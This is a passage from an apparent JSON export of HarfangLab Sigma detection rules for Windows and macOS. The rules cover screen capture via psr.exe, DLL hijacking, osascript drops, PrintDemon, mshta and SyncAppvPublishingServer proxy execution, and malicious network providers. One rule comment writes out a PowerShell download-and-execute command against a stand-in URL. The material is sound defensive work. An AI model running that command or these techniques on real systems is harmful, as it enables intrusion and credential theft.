'\\psr.exe'\n - OriginalFileName: 'psr.exe'\n selection_commandline:\n CommandLine|contains: '/start'\n\n # https://learn.microsoft.com/en-us/troubleshoot/windows-client/networking/data-collection-for-troubleshooting-802-1x-authentication-issues\n exclusion_troubleshooting:\n CommandLine:\n - 'psr /start /output ?:\\MSLOG\\\\*_psr.zip /maxsc 100'\n - '?:\\windows\\system32\\psr.exe /start /output ?:\\MSLOG\\\\*_psr.zip /maxsc 100'\n\n # https://learn.microsoft.com/en-us/microsoft-365/troubleshoot/diagnostic-logs/use-msoaid-for-authentication-issues\n exclusion_msoaid_parent:\n ProcessParentOriginalFileName: 'MSOAID-Win.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n 
exclusion_msoaid_grandparent:\n ProcessGrandparentOriginalFileName: 'MSOAID-Win.exe'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b607e37d-aaf6-49a2-8a8c-e021f3ccfd3f",
"rule_name": "Execution of psr.exe",
"rule_description": "Detects the execution of the legitimate psr.exe Windows binary, which is the built-in Problem Steps Recorder used to record user actions together with screen captures.\nAttackers can abuse this tool to perform unauthorized screen captures, potentially gathering sensitive information about the victim's desktop.\nA suspicious usage example includes recording a user's screen without creating a graphical user interface (GUI).\nIt is recommended to investigate such executions, review the permissions of the user account executing psr.exe, and ensure that screen capture activities are legitimate.\n",
"rule_creation_date": "2022-04-11",
"rule_modified_date": "2025-04-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1113"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b60df06d-a3a6-4d8c-aa52-2fa9cb0aa028",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593280Z",
"creation_date": "2026-03-23T11:45:34.593283Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593291Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://infosecwriteups.com/dll-hijacking-persistence-using-discord-80691a63c559",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_phantom_dll_hijacking_discord.yml",
"content": "title: Phantom DLL Hijacking via Discord\nid: b60df06d-a3a6-4d8c-aa52-2fa9cb0aa028\ndescription: |\n Detects a potential Windows DLL search order hijacking via discord.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://infosecwriteups.com/dll-hijacking-persistence-using-discord-80691a63c559\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/22\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'discord.exe'\n ImageLoaded|endswith: '\\Discord\\app-?.?.????\\d3d12.dll'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Discord Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b60df06d-a3a6-4d8c-aa52-2fa9cb0aa028",
"rule_name": "Phantom DLL Hijacking via Discord",
"rule_description": "Detects a potential Windows DLL search order hijacking via discord.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-22",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b64483ff-8815-49ef-be8a-4621359d1de2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296583Z",
"creation_date": "2026-03-23T11:45:35.296585Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296590Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_file_create_osascript.yml",
"content": "title: File Created by a Process Launched by Osascript\nid: b64483ff-8815-49ef-be8a-4621359d1de2\ndescription: |\n Detects a file creation by a process whose ancestors include Osascript.\n Adversaries may use Osascript to drop malicious files.\n It is recommended to check the maliciousness of the created file and other actions made by the Osascript process.\nreferences:\n - https://www.elastic.co/security-labs/DPRK-strikes-using-a-new-variant-of-rustbucket\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2024/06/18\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - classification.macOS.Source.Filesystem\n - classification.macOS.LOLBin.osascript\nlogsource:\n product: macos\n category: filesystem_event\ndetection:\n selection:\n Kind: 'create'\n ProcessAncestors|contains: '/usr/bin/osascript'\n\n exclusion_docker:\n - ProcessImage: '/Applications/Docker.app/Contents/MacOS/com.docker.backend run'\n - ProcessCommandLine: 'sh -c echo * > /tmp/docker-desktop-privileged*/exitcode.txt'\n\n exclusion_football_league:\n Path|contains: '/FootballLeagueApp/'\n ProcessImage: '/bin/pax'\n ProcessGrandparentCommandLine|startswith: 'osascript -l JavaScript - wid:'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b64483ff-8815-49ef-be8a-4621359d1de2",
"rule_name": "File Created by a Process Launched by Osascript",
"rule_description": "Detects a file creation by a process whose ancestors include Osascript.\nAdversaries may use Osascript to drop malicious files.\nIt is recommended to check the maliciousness of the created file and other actions made by the Osascript process.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-02-23",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b65427c9-a48f-4b0c-9565-50145be9c5fb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611266Z",
"creation_date": "2026-03-23T11:45:34.611269Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611277Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://windows-internals.com/printdemon-cve-2020-1048/",
"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1337",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1112_malicious_printer_port.yml",
"content": "title: Malicious Printer Port Installed\nid: b65427c9-a48f-4b0c-9565-50145be9c5fb\ndescription: |\n Detects a registry modification to the \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Ports\\\" key, indicating that a potentially malicious printer port was added.\n This could be a sign of CVE-2020-1048 or CVE-2020-1337 exploitation (aka PrintDemon).\n PrintDemon is a security flaw in the Windows Print Spooler service, which runs with SYSTEM privileges, that abuses the way Windows handles print jobs through the spooler service.\n It is recommended to investigate the registry modification to determine its legitimacy.\nreferences:\n - https://windows-internals.com/printdemon-cve-2020-1048/\n - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1337\n - https://attack.mitre.org/techniques/T1112/\ndate: 2020/09/24\nmodified: 2025/03/18\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.defense_evasion\n - attack.t1112\n - cve.2020-1048\n - cve.2020-1337\n - classification.Windows.Source.Registry\n - classification.Windows.Exploit.PrintDemon\n - classification.Windows.Exploit.CVE-2020-1048\n - classification.Windows.Exploit.CVE-2020-1337\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_event:\n EventType:\n - 'SetValue'\n - 'DeleteValue' # want to catch the process removing the EoP\n TargetObject|startswith: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Ports\\'\n\n selection_file:\n TargetObject|endswith:\n - '.dll'\n - '.exe'\n - '.sys'\n - '.ps1'\n - '.vbs'\n - '.bat'\n - '.com'\n\n condition: all of selection_*\nlevel: high\n# level: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b65427c9-a48f-4b0c-9565-50145be9c5fb",
"rule_name": "Malicious Printer Port Installed",
"rule_description": "Detects a registry modification to the \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Ports\\\" key, indicating that a potentially malicious printer port was added.\nThis could be a sign of CVE-2020-1048 or CVE-2020-1337 exploitation (aka PrintDemon).\nPrintDemon is a security flaw in the Windows Print Spooler service, which runs with SYSTEM privileges, that abuses the way Windows handles print jobs through the spooler service.\nIt is recommended to investigate the registry modification to determine its legitimacy.\n",
"rule_creation_date": "2020-09-24",
"rule_modified_date": "2025-03-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1112"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b6605352-f429-404f-a2c4-e4a55585deb0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083634Z",
"creation_date": "2026-03-23T11:45:34.083636Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083640Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.joeware.net/freetools/tools/lg/index.htm",
"https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/",
"https://attack.mitre.org/techniques/T1069/001/"
],
"name": "t1069_001_localgroup_via_lg.yml",
"content": "title: Local Group Discovered via LG.exe\nid: b6605352-f429-404f-a2c4-e4a55585deb0\ndescription: |\n Detects the execution of the LG.exe executable in order to discover local groups.\n Adversaries may attempt to find local system groups and permission settings.\n The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\n It is recommended to investigate the process calling LG.exe to look for malicious content.\nreferences:\n - https://www.joeware.net/freetools/tools/lg/index.htm\n - https://www.sentinelone.com/labs/operation-tainted-love-chinese-apts-target-telcos-in-new-attacks/\n - https://attack.mitre.org/techniques/T1069/001/\ndate: 2023/09/04\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1069.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'LG.cpp'\n\n condition: selection\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b6605352-f429-404f-a2c4-e4a55585deb0",
"rule_name": "Local Group Discovered via LG.exe",
"rule_description": "Detects the execution of the LG.exe executable in order to discover local groups.\nAdversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nIt is recommended to investigate the process calling LG.exe to look for malicious content.\n",
"rule_creation_date": "2023-09-04",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1069.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b6be76e7-26f5-4dea-995f-08163fda806c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078675Z",
"creation_date": "2026-03-23T11:45:34.078677Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078681Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dwm.yml",
"content": "title: DLL Hijacking via dwm.exe\nid: b6be76e7-26f5-4dea-995f-08163fda806c\ndescription: |\n Detects potential Windows DLL Hijacking via dwm.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dwm.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CoreMessaging.dll'\n - '\\coreuicomponents.dll'\n - '\\d2d1.dll'\n - '\\d3d11.dll'\n - '\\D3DCOMPILER_47.dll'\n - '\\dwmcore.dll'\n - '\\dxgi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b6be76e7-26f5-4dea-995f-08163fda806c",
"rule_name": "DLL Hijacking via dwm.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dwm.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b6c4d3fc-ca0b-4f9f-bf52-c889a39fbf40",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080432Z",
"creation_date": "2026-03-23T11:45:34.080434Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080438Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Mshta/",
"https://medium.com/@djordje.brankovic/inside-a-fake-captcha-phishing-attack-how-attackers-use-mshta-exe-and-powershell-to-deliver-xworm-cc7cdfda95ce",
"https://attack.mitre.org/techniques/T1218/005/"
],
"name": "t1218_005_mshta_powershell.yml",
"content": "title: PowerShell Execution via mshta.exe\nid: b6c4d3fc-ca0b-4f9f-bf52-c889a39fbf40\ndescription: |\n Detects the execution of PowerShell via mshta.exe.\n Mshta can be used to proxy the execution of a malicious content through a trusted Windows utility.\n It is recommended to analyze the content of the file executed by mshta.exe as well as to investigate the command executed by the PowerShell process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Mshta/\n - https://medium.com/@djordje.brankovic/inside-a-fake-captcha-phishing-attack-how-attackers-use-mshta-exe-and-powershell-to-deliver-xworm-cc7cdfda95ce\n - https://attack.mitre.org/techniques/T1218/005/\ndate: 2025/04/25\nmodified: 2025/04/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218.005\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.LOLBin.Mshta\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\powershell.exe'\n ParentImage|endswith: '\\mshta.exe'\n CurrentDirectory|contains:\n - '?:\\Windows\\Temp\\'\n - '?:\\windows\\system32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\ProgramData\\'\n - '?:\\Users\\'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b6c4d3fc-ca0b-4f9f-bf52-c889a39fbf40",
"rule_name": "PowerShell Execution via mshta.exe",
"rule_description": "Detects the execution of PowerShell via mshta.exe.\nMshta can be used to proxy the execution of malicious content through a trusted Windows utility.\nIt is recommended to analyze the content of the file executed by mshta.exe as well as to investigate the command executed by the PowerShell process.\n",
"rule_creation_date": "2025-04-25",
"rule_modified_date": "2025-04-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1218.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b6e34025-c8bb-4d31-b753-65184d578ae6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072865Z",
"creation_date": "2026-03-23T11:45:34.072868Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072889Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/",
"https://twitter.com/andreanaspi/status/1634284600422813703",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_syncappvpublishingserver_vbs.yml",
"content": "title: Suspicious Proxy Execution via SyncAppvPublishingServer.vbs\nid: b6e34025-c8bb-4d31-b753-65184d578ae6\ndescription: |\n Detects the use of SyncAppvPublishingServer.vbs which is used by Microsoft Application Virtualization (App-V).\n This VBS script can be used as a PowerShell host to execute PowerShell code and should never be in use unless App-V is deployed.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to investigate the parent process for suspicious activities, as well as for other malicious actions stemming from SyncAppvPublishingServer.\nreferences:\n - https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/\n - https://twitter.com/andreanaspi/status/1634284600422813703\n - https://attack.mitre.org/techniques/T1218/\ndate: 2023/09/04\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Syncappvpublishingserver\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # SyncAppvPublishingServer.vbs \"n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX\"\n CommandLine|contains|all:\n - 'SyncAppvPublishingServer.vbs'\n - 'n;'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "b6e34025-c8bb-4d31-b753-65184d578ae6",
"rule_name": "Suspicious Proxy Execution via SyncAppvPublishingServer.vbs",
"rule_description": "Detects the use of SyncAppvPublishingServer.vbs which is used by Microsoft Application Virtualization (App-V).\nThis VBS script can be used as a PowerShell host to execute PowerShell code and should never be in use unless App-V is deployed.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to investigate the parent process for suspicious activities, as well as for other malicious actions stemming from SyncAppvPublishingServer.\n",
"rule_creation_date": "2023-09-04",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "b713fdb6-4c07-4d42-ae5c-44b619b0a4d5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075583Z",
"creation_date": "2026-03-23T11:45:34.075585Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075590Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.scip.ch/en/?labs.20220217",
"https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",
"https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy/Get-NetworkProviders.ps1",
"https://attack.mitre.org/techniques/T1556/008/"
],
"name": "t1556_008_network_provider.yml",
"content": "title: Network Provider Installed\nid: b713fdb6-4c07-4d42-ae5c-44b619b0a4d5\ndescription: |\n Detects the installation of a new Network Provider.\n Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.\n Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process.\n You may use the Get-NetworkProviders.ps1 script in the rule's references to list all registered network providers. It is recommended to determine if they are legitimate.\nreferences:\n - https://www.scip.ch/en/?labs.20220217\n - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy\n - https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy/Get-NetworkProviders.ps1\n - https://attack.mitre.org/techniques/T1556/008/\ndate: 2023/08/08\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1556.008\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\NetworkProvider\\ProviderPath'\n\n exclusion_empty:\n Details:\n - '(Empty)'\n - '\"\"'\n\n exclusion_system:\n ProcessImage|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_cbfs:\n ProcessImage: '?:\\Users\\\\*\\AppData\\Local\\Tresorit\\v*\\cbfs-installer.exe'\n\n exclusion_vbox_additions:\n ProcessImage|endswith: '\\VBoxWindowsAdditions-amd64.exe'\n Details: '?:\\windows\\system32\\VBoxMRXNP.dll'\n\n exclusion_citrix:\n Details:\n - '?:\\Program Files (x86)\\Citrix\\ICA Client\\x64\\pnsson.dll'\n - '?:\\Program Files 